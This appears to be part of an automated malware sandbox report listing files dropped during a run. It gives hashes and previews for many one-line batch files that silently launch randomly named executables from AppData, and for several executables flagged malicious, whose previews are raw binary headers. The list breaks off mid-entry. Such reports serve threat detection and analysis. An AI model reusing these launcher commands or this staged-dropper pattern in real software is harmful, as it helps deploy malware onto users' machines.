SHA-256:	FDC9818350F569586C23058C5CF67F0AE32384508489138C2B850FA67A676FBA
SHA-512:	443028028A7BB9AE606A659270A473D099BDDF342C9E54C3A592BB6CFB69DF97557647697AEB632D08712C36C33816B7707A2245484EDA2525ABBB8216B3494D
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\KaHPEM2tjHD1595lRxdfqHsL.exe" --silent --allusers=0

C:\Users\user\AppData\Local\Temp\1001059001\f0pnZDMd6RaZV3ru6ZcvWYoh.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.93331996755818
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5BKUsCnuDEbm:fE1N723ECEym
MD5:	99C6B81E220158D0E0BA1A1075CD9CE2
SHA1:	92112036B9BDA157D84280685034926A6C4B3E7F
SHA-256:	C3DDB5A2760C317C2B5D71A89F6F79977EFDF857B056AEB21E0CB1CD1BF5B393
SHA-512:	AA68D1083F56F642DDB2CCF9C6593EEAEAC41220E9A3D323F9AE28CA74B914896D15228CF3832169500B9638706F79697FF63DE5AD5628AE2500BF5552516FF8
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\domCqD7LBg1Q0KxGLvuFe0Aj.exe"

C:\Users\user\AppData\Local\Temp\1001059001\flhAOmHuPU4rOQraF9et2tNv.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.87973259880924
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5TLJkIWzT//Nl:fE1N723OIWzTNl
MD5:	B55532E55141CC7022EB5BD92DEC5EF6
SHA1:	AF560EB9942522881CE643D3A0B56ECC30AF6A7B
SHA-256:	7F0FA6714995C1BA44A7E22EF5F7F0351619B90C2FA4CCEEA96B223848EA5AED
SHA-512:	9CFF0015C7C718C44299CE63347D1DFDCBBEE16480CFA53DEF12C9C67605BDF7849E88F5E8FCC11333BECEB7CC24D4DA7214ED669C9D8999DEF19515CF578091
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\vFvvln76msVyiTRvQQMSlc4y.exe"

C:\Users\user\AppData\Local\Temp\1001059001\gKz1moE7eup3G7nOTrAM5FEe.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.885154258886507
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J52KRdZcFn:fE1N7232acF
MD5:	1313B9CD85DC0EA9F8EEEB9048EAB11A
SHA1:	07679C3D0FFE4C27613759EF23A6BFD4BF7E4DB3
SHA-256:	5BDFE9EE9102FEEDDD705A19E86398D50E15333724B34C2DDA57F3B8C47CB68E
SHA-512:	5E5C5DAD6E53BF65EEAF40BEF923846007F53907F54865C465CEAE1066250C18269FE35084BAD877ABF58E5D00D80AE9BB7C108D0F103173868466976CE304F7
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\SN8aMZWrntrM7YJrmHS2jN15.exe"

C:\Users\user\AppData\Local\Temp\1001059001\gexYuw0NRhQ8R1rZTdriSThP.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.7547817318321615
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5KdSmDOmCCHF:fE1N723KkmBF
MD5:	D6A2E76C332CC8C7AD11F0E08A2428BC
SHA1:	7BB48620C604C652A69980A4B203D61C0D140A5B
SHA-256:	7851DD9D68D1B086D4026E89423FC1518A25946ECE4BDE56C35BA9A7DBBD4569
SHA-512:	40766BCEF26C6860052C1DFDB0170978DC301396A8577E450FC1E3F6E216247F8DE31FF3E17AB7C2D92F1F24651B28BF4202CD7812551D4D5BF37975F72EEAD3
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\oxW5doxruDrLfkxekfdC42S3.exe"

C:\Users\user\AppData\Local\Temp\1001059001\gtUxZk6cj8wfEklu1LBTS737.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.770367279629696
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5dgWOaI0CA5p:fE1N7231e0D5p
MD5:	4BFED7B27A7C5C9E9913CBA7CF787499
SHA1:	EE622839C3599A859A0018C623CF635DD5344316
SHA-256:	5BCC663FB2B17A70D913A63A68ABBA78F97C42489A5D041C88FDCAA33CD88CE7
SHA-512:	732F9CFDE510105BC3DE22E77A8B47A4D9923A8E3D4D4D01B4646E4FBB6855FA4864C26A378FED311B6321610A162E2F30AFC8DB8A8F950A9972AA5A5C372BCE
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\xEsbKulN7hG8EPnegeeycsh4.exe"

C:\Users\user\AppData\Local\Temp\1001059001\hn24jhY0Fv65Hr2JNkbIUU32.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.952581383501413
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5WS9L2slnxW8L:fE1N723WS92slnQ8L
MD5:	067CC813CF74A7DA77AEA62037D5DA13
SHA1:	78D2031F917DC8D2E6908881CF504443E742190F
SHA-256:	5D177C063F61926E7BF61BAB8C7D7090B9DD64986AAFE73C472773BACB6713D3
SHA-512:	862300E46C581E5651CDAF710A17D127FB8264A091B4FF092183A6C0F23F1E2A995E6610C29BA9F009870218836D65C7DB413A810B2F596E3E87B3B0B99BD994
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\swXqwxxcUE7SVCRYdUBHf3nm.exe"

C:\Users\user\AppData\Local\Temp\1001059001\iGgltwF3cPJJEQEEusF5Xi0h.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	5.01181280720267
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5skmwrBAdmn:fE1N723skhr2dm
MD5:	D4447E6E276ED8650F4756A62DDD78B8
SHA1:	5CD8D9FAA86DCD2B814DDD0268EFA483FB05C030
SHA-256:	49CD2B52CD58483E374EA6E008D12BB4FDCE20F9B20092ADD83C2B118A799303
SHA-512:	240E1F40D39E3EF91CFFBC646D41441659CC3EB1999BEB295E5FB5797ACDA79427BEDBE4E77336CCB2DF56EC465C547B0B40367E12B861483B68018EE31375CF
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\IA1JiyWIGEvHCZKTDOlZNrXb.exe"

C:\Users\user\AppData\Local\Temp\1001059001\isSKeeo2YpQheeY24R4j9G2t.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.943804516199339
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5cA5wcNAA9zF:fE1N723cA5wmAA9zF
MD5:	932CCF967C1463F499827BCE69028D49
SHA1:	3535A4E9633D2C3815B55431C2AB3F672A27C88A
SHA-256:	97EE600EAAA3721F500500C432AE59F6CAE1690EB531A1ACA1E086C45570927C
SHA-512:	58BDA62D94F72516913CD7B8C0CBAC1F4DC6DEBBB771B23E3DA4D834A4D4ADA8B9309EB8073BA9DDC2882F3BABF8A875A54A78CAA12EEE29882058A85CF058F0
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\yybBRlcB659iEk7Vesfqc6Zw.exe"

C:\Users\user\AppData\Local\Temp\1001059001\jVb7NGJ5fDo17zuI07wKXTkn.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.862798141185995
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5wrsCN245I/4AHFn:fE1N723wvK4m
MD5:	2C825A43484BC4F187E69EC8ABFC9A9E
SHA1:	D5D4AE2AF575F434E1C4BC0C0146CF171FF5A32B
SHA-256:	BEF69108BD2FEC136BA9D0BEE1EAF9B20D924FF8B9C6DDBF2503D8EF2D909D79
SHA-512:	AF48860DB052BB6F59F10AC73CC5642425B596BB022272CC8ADFB8C266CB8319F6C1274031786F5FD79F5E304B87D28296E95EF034CD24D218AF2D35CB953284
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\UNI7mc4Nnga4yNCGVfbOvnYn.exe"

C:\Users\user\AppData\Local\Temp\1001059001\k4WDKn5GdBylasbk9EPm9Oxn.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.9432486990122095
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5gfjSpSykdan:fE1N723gfeD
MD5:	1F510DFC922459318D7F05BFD9DF7C7E
SHA1:	6531A512BBC7A62D4EDDAC28FCEE4C74400FCF8F
SHA-256:	533EB351F4278A3A660AAF84B026E2DBEC609BEAAA07173C0FF60F7D1B95F85D
SHA-512:	2777AC3824C181226B36570348F664D2E2FD4CD21CB6CA3C7521DA2A0D8216ADF17ABD1B8710A9E2ADDF628B035411E63C6545B6E7D56E512B924B8C190C4FDC
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\Ee4C8pygmuP2wWmHYlaPNRsj.exe" --silent --allusers=0

C:\Users\user\AppData\Local\Temp\1001059001\nruxO9vtSEsvmw1nJfHLNbN3.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.998746112546941
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5opBTGw9QPkdan:fE1N723opJQD
MD5:	E48943183DC0B6C0F54C4DABF89C7BE2
SHA1:	0A55523AA90C18738278256F74EFB920BFA3391B
SHA-256:	0565403040A6C484F31369F8D08EEE1299D0B9934372F536A46C923387EB2088
SHA-512:	B8376B418AE4D6EC8CF488DEA3CB33C40D5EB998890E0F29A872D51EBAFE33DF45C31147FFD0067BC60F399C3976CC8012E7E27B657F10F134BE44BF83FF3DFD
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\MnKGY5RWTeEWMNUxbLjGgu1v.exe" --silent --allusers=0

C:\Users\user\AppData\Local\Temp\1001059001\o9rQUR3l55wTcAhNhuto03lk.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	5.0291060363392885
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5M6DQtpXd2AdAHF:fE1N723M6D+N2AdiF
MD5:	85E96CBF52BC30B1637B38E5ACD23FC0
SHA1:	C4C82BAF3F99D0FCC8FB12B987AA0487FBBE625C
SHA-256:	2E7FBA247B190BDC9A789B432A2996184B3C4D92A6C61038D5864A996BBC304D
SHA-512:	AAD317D7A959F7CB18EB0C453488C47583D0269706DCD7D58E80B53AC0AAFF66C79040DECE3D7EE4EE40162C61C4EAB070DE5A2527838D7D0274A40C129B8499
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\ikwgyD2WNrub0XxL5g8QM7GI.exe"

C:\Users\user\AppData\Local\Temp\1001059001\oWpy9mG9Ds15Yw7FsUFYFKZz.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.890217147450399
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5k7kDXgA6PHLNHFn:fE1N723k7kLgDHLNl
MD5:	06A2313C14E38CB4BD08B87C55252574
SHA1:	8AA964EEF18CFD65B34E7754D8D767DC1E5CD613
SHA-256:	CB8FD0271860F67C7E976282D395CCE5198598627793CB9B07A6A39EB7212111
SHA-512:	53CE55264933C4ABCFA377032A559029B475F7BAA920813AEEA89F705B2C9B55B05D41C697CEA7C7EF102ED986CCD90A896F5FAA802633EF4B4F0C4649FD018D
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe"

C:\Users\user\AppData\Local\Temp\1001059001\ory2z8Uv63Q76t6KnnuaZBZ3.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.990843709920351
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5Vx2hvIh3PAl:fE1N723b2hQh3Pm
MD5:	0AF8DB4EFCAED6716BF3251839324576
SHA1:	2F7D01262A410D603B8F1D7F51584C857E913F41
SHA-256:	9759ACE2A1A1263B05B62DFC3FC9E815BC4BDD51857454E68DBD82DA59898E27
SHA-512:	DD110CD6101DA9F62D6A43E101FFDE662B78D8E9A4F59C45EDDC29F2BA561BBBEE135372AAD0CF6981189F4C6FDF7611A7B821085D759A5F2E8E57BA8A68EC5E
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe"

C:\Users\user\AppData\Local\Temp\1001059001\p8NzMeukSixzfsrv1eOsaArK.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.921448398498828
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5EmmcFgcnVZLAsn:fE1N723EmmcFHnVZ0s
MD5:	5C9543E071A1C2B410DA9ED7C6B19C27
SHA1:	ED8F4A94D3D91F13F9E21FCD01AF806EC148219C
SHA-256:	B697B169778FCD09ED522C5807C5641DD1AAB93BD4090B955A6AA2CA26E1367A
SHA-512:	9455E781B7E7D74FE862ED858ACFFEBC5DF5A01EA53A97001CF886E842F7D943B473778DE846F53FC26683B2AC161C0EDFDB9D3864F7BD45A7599F80213EA4AC
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\aCC9Y3uZiPILOE7CPQBm3dqe.exe"

C:\Users\user\AppData\Local\Temp\1001059001\r2A0rS3VHsn8vyJeZHhKfWXr.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.999360071754895
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5guQcVmneFLAsn:fE1N723gfcMuLv
MD5:	B88CB69E2D0D2C029C3FB4FCCC7C1CB4
SHA1:	9FB0DA8BD317720F6F4FB295837898EB149C89E9
SHA-256:	29791F138DF2877111BD488C38578B9F50A6151976F38BAD57AFFC26ADF4A01B
SHA-512:	154E98630482FE9E6492C46FC438389FC375FADC76BDCE9B2C537F003C85E61A5B00277710B1E71470E57CB823AB7923022E5C3AAE4E5CC5F8A8992BEA668EF1
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\EbkuLW0CG2HYrP9ej87UFUE5.exe"

C:\Users\user\AppData\Local\Temp\1001059001\rocNHTvv38JS6pWod6Y4Gd91.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	5.039590584980447
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5HUXG8UayMRq+As:fE1N72378UafRq/s
MD5:	9D72B03B1118A4FCF9C6E886D1F8D01B
SHA1:	F34149A8736D7C505ADE473B16D141626B9FF54A
SHA-256:	107DA8CA2778FE18225BBF25A9690F4CFA79169D9D8B71E4660CF0C99A2973CD
SHA-512:	FB4E648D6D4C5D6A93D3C50B10B6D27BC37CCF72A13FD2AD19C9C500317261CF926DA797852AA0E9000D62C4BA55C3E4BABD94B861B9628BB04083CF9EB567CF
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\b135cfRMuAwZwxqPJGvWitOU.exe"

C:\Users\user\AppData\Local\Temp\1001059001\sKWhFmW1UBgSm2O3z2QVt6hX.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.987488502695543
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5Tv7vsPELm:fE1N7233MELm
MD5:	6B095FF6857227AFC9EBD67B7935086B
SHA1:	2DF53CDD3C627452A5405733B2A63E144D1DFD28
SHA-256:	A4050D09F05EF31FFB97743B70982043296D7059210F5B7CB0F6140087523CBD
SHA-512:	DD6E29A4B9CD868465AB2A1B481C09B6BB91D0D3124EAE3176D9A46434C0039B81A832E1DD801AAC8E5271AFE470BE33A3434534490967A6D3016BCCE9AE2523
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\vjbBGdKLPrfqevTO8NoyWGaS.exe"

C:\Users\user\AppData\Local\Temp\1001059001\sx87S9fjIWqhIFU42ChmdBD5.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.9457727030059555
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5rAOvEKZqu0L:fE1N723MOLZq3
MD5:	2A5D5D37FD75AEE74E4EF0561444C03E
SHA1:	DBA8C16E5EBCAAD416ED2CA86DE3914368D7ADA6
SHA-256:	651F03F4F10AABA73E6AA2B2F642C47C8CC556567EA06141EBEDE93406723EBB
SHA-512:	CAE79DC796F48AEC1F22DE5CF8375D7D796DC74B000FDC6D79C173FE10756C9D15264619193F9B493DC96E2EC6A74EEC81C71826D46107D8327F7BD9AED1D045
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\NVX3Pk7yCVoYnwk8B8rP7BRQ.exe"

C:\Users\user\AppData\Local\Temp\1001059001\vWfNA9ItlVbIhYLgDbH2qYCB.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.96167891172438
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5S/iDSnWiVMCsL4m:fE1N723S/yIl1I
MD5:	1986460D9C5E99F780426B0B1A145D23
SHA1:	6D89316F079EEDC197A788D03AC585A158ED226D
SHA-256:	C8D96BF203EF28ACACE7A926F1C93FAC05DFE6C4A8A8B80EAA68EA8A4D3E62BD
SHA-512:	D9EB35E736270A1276786FFF1565A64114AFAD3332050E7F8E9A73E57E9EA8E670F9E5DED3EC5884384C5856BA6D2F2AABBCDDA8AB71A668FB6876CDB39BBBBB
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\wXamxKfyZPmwZrj3GYJOigy8.exe"

C:\Users\user\AppData\Local\Temp\1001059001\vtH7nDBrnek0dvASVqeqkxmh.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.8559894606905365
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5WfIdXR6Ln:fE1N723Ww6L
MD5:	BE0FD70D21AFB8589BD4830F800B2D4E
SHA1:	4183DE9303E87D1817678FB82DFC87BA6DE5F691
SHA-256:	0C03592E614418CE792EB8EF47F6D68DAC5E984144B72C0F6C90159541048D19
SHA-512:	D86D89CF4160F899B82B0F91E3D1E60227C8C3CD010024A905696E6DA9B267C6FDB79C4019B6E1CDCC2A530D368E7101F8B7F085ADA95F801B6882D8246B5B13
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\szmZp5wR4ysalkWrHfDx3ALH.exe"

C:\Users\user\AppData\Local\Temp\1001059001\wECmGoZSCpcGomt5tgyfkCt8.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.895057641139242
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5c41HdUv3EffxCF:fE1N723c4NAEnxCF
MD5:	B935E8775E5AD8D0BAC586DAAAE88B7B
SHA1:	27945E08D207B6E781D5D6CAC9DA5E7190D84B56
SHA-256:	CCF15AA6EBCBC98FE5CA4CC3D48B5D411A507A4891EA76E36716E4F4828C5EA9
SHA-512:	D65C116219A99D6DD58D0AF59702DFFBB65B549AF9E400A81977B0CC03652BF774A8D589A14FF432252DEAB548CCFA8329E4311BBE015767F5DC92CF000EA9AA
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe"

C:\Users\user\AppData\Local\Temp\1001059001\wHUmqxGl1NXuimy6s35CfrOK.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.84375912011781
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5Xu+Dwjrm:fE1N723e+DWa
MD5:	3312836AFE46ADA3F1138532B148D781
SHA1:	C9CB44DAC79CFC6BF1DB4AB9C9BF7CA7F855D488
SHA-256:	E1726A67F016838E4A93409C887EFAA458D14797655A2286CF2AE157605F8BB9
SHA-512:	B4160C61EA7C97899D38964B44F3E531C8D1EC3FA1E5DEC6ACE8FB5703AC32D9895A5831504FE468D478D955648F038470F57BC90071A53765B6647D1CDFBEC5
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe"

C:\Users\user\AppData\Local\Temp\1001059001\xTp4bHJiLrusMpbtmcQ6RM59.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.84008325197211
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J527dvFQdh0RDVCl:fE1N72327dDlwl
MD5:	B63C3B29F99CE54D49D6585F391BDCF8
SHA1:	2B386046A06BDCB42506F2F074D3046ECF62B5D8
SHA-256:	D562DCC16FE9B92EB8C4B324D89FCB5051C479284C7E651DE9F3A705F87B34F5
SHA-512:	033C40408557D63274F21A8931F6F79409487C9FE89DA05E9DC7977DB76B87F146CD577427DEFE5AD815BED4529AA8F4D63AFE3E92736E09149493777EC4EE2C
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\SYo7pMEIUYDach25xrEqQtfo.exe"

C:\Users\user\AppData\Local\Temp\1001059001\xfnvi9jPfFxOupLhRqQ53EM3.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.996265369997617
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5dsTCOTqsVwL4m:fE1N723zmhVwkm
MD5:	E018E7AF0F571D99CC7EC8CBD1141017
SHA1:	EC84309F469BF4D14B82968256649FACAE0C9F1E
SHA-256:	8DF5BEC95C964602FC03E414D4A49727F7E8FDEF84AEFA969BB635B9D8D200BB
SHA-512:	D151260B65FF602927F060018A6A4DA4D10CFFFCD1704F63AA7EB7B24DD13EA2F7B1B7DC331F9B52198AE245A994AD97389709F22075596239004C8820D4EBFF
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\xIvgySaF2JVAOfOVBY400p1d.exe"

C:\Users\user\AppData\Local\Temp\1001059001\xly7DWkYKo5WnXstfCeJrt5O.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.851954821031462
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5g35nxh0gJF:fE1N723gJxbF
MD5:	C260181EAD6533986C5FDE5A06A5F97A
SHA1:	4B0E74B53F2A2F0B61CAA6BA06B6D9DC37DDABC0
SHA-256:	036024AB6BFBC4F6D5586A46D6C5A3277618F8F59156F1C316593FA0006FA0A7
SHA-512:	182B1DEEE6AF9518E0E7FF9E35631CD4674A635B2B43D4E6E37D505BD8A935DD9799F48E279325735403B95D64685EDA6B2F9693EDA2C2B21A8485983FA6D7B6
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe"

C:\Users\user\AppData\Local\Temp\1001059001\zjeauCZFVCgTqOll4Vc5L2Ft.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.978972140860999
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5W63oOGrLAdAHF:fE1N723WEMfACl
MD5:	B8AC086A180C8031E1CBF707E9124DF7
SHA1:	36DCFFC04676BC5B9C0EFC543F7E6999C82B5738
SHA-256:	41F19CB0FC7459052F78EDD2A4032199BBAD6AF478889BA9D900554F7AD15B81
SHA-512:	ABE2A4E9514E92EF2A897F6F2DEED30B2CB416AFF9A97E44F3923C607555BE0C1122F320DD46B18229F893CB5B155C98534C491B1BC982EBEE8436B0EAEC4AA7
Malicious:	false
Reputation:	unknown
Preview:	start "" "C:\Users\user\AppData\Local\33tIGBzVuCMQl3Wc6IvtNEjP.exe"

C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	329352
Entropy (8bit):	7.976897467568528
Encrypted:	false
SSDEEP:	6144:DFZcMaQk5oqtag00+wX3bSJxuI2Hc8PlsLNuPhRF1Ym:DFZg5Ztj00+03mJxmc8PfPwm
MD5:	1C7D0F34BB1D85B5D2C01367CC8F62EF
SHA1:	33AEDADB5361F1646CFFD68791D72BA5F1424114
SHA-256:	E9E09C5E5D03D21FCA820BD9B0A0EA7B86AB9E85CDC9996F8F1DC822B0CC801C
SHA-512:	53BF85D2B004F69BBBF7B6DC78E5F021ABA71B6F814101C55D3BF76E6D058A973BC58270B6B621B2100C6E02D382F568D1E96024464E8EA81E6DB8CCD948679D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]h.f................................. ........@.. ....................... .......b....`.................................L...O.......:................N........................................................... ............... ..H............text........ ...................... ..`.rsrc...:...........................@..@.reloc..............................@..B........................H........................................................................0..........r...p...(......0..........rg..p...(.......]*.0..\.........i.s........+...o.......X.... ....2..o.......o........8.........-X....d....(......(....&s..........o......o.....1......o...........o....r...po.....3....+.s.........o.......o.......o.......o.......o.......o.......Lo.......o.......o...........o........o.....Yo.........+........(...........o....+....2...X.. ....?........+A..... ........

C:\Users\user\AppData\Local\Temp\1001084001\random.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2254848
Entropy (8bit):	7.952649397372934
Encrypted:	false
SSDEEP:	49152:dSUl6vD5DxN6HHLJ9tFdK/YhCgDLqs9AcGhAKwXYlkWlTB:dSSwD5DxkCHg/9KwXGkWT
MD5:	DA6F6F980F895340769B6811440D7D23
SHA1:	0113A11E4D6BAC4644B39FF040D1432F9C0F4125
SHA-256:	2EDF1263369007F259A9424DE34B7E050BCEE6D01DA5D1387A405F7FD4F09CCC
SHA-512:	6583CB129A1885199FA04656340011DD049CCEB00DCFAE79268C645CFFC60A9EE3EF1B5ADFD0177E506629F387E696E312E8F21E1FC45657A18C33183DCCF413
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..\|}...t..\|t...t..\|....t......t..\|v...t.Rich..t.........PE..L.....f...............'.4...........0X......P....@..........................@X......."...@.........................x.W.L...m........P..P...................h.W...............................W.............................t...@................... . .@.......>..................@....rsrc...P....P.......N..............@....idata .............Z..............@... ............\..............@...vponqxxe..... ?......^..............@...ifnpghhs.....0X......f".............@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
